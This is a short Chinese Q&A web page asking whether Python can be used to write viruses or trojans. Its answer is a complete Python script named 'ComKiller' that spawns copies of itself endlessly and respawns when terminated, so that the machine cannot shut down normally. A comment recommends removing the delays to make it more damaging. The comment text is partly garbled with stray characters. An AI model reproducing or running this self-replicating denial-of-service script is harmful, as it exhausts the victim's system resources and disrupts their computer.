您的位置首页生活百科

python能写病毒或者木马什么的吗?

python能写病毒或者木马什么的吗?

# 这是一个小病毒,名叫ComKiller(计算机杀手)# 效果物前埋悔培:运行约10秒后无法正常关机# 注:把那两行 time.sleep(0.1) 去掉效果更好哦:)import osimport signalimport ctypesimport timeimport threadingfrom pathlib import Pathdef help_sos(): cmdr = os.system("start python %s" % FileName)def Error(): while True: try: help_sos() except BaseException: help_sos() time.sleep(0.1)signal.signal(signal.SIGTERM, help_sos)FileName = Path(__file__).namewhile True: time.sleep(1) T = threading.Thread(target = Error, args = ()) T.start()#仅用于娱乐,干罩蚂什么非法的事情和我无关!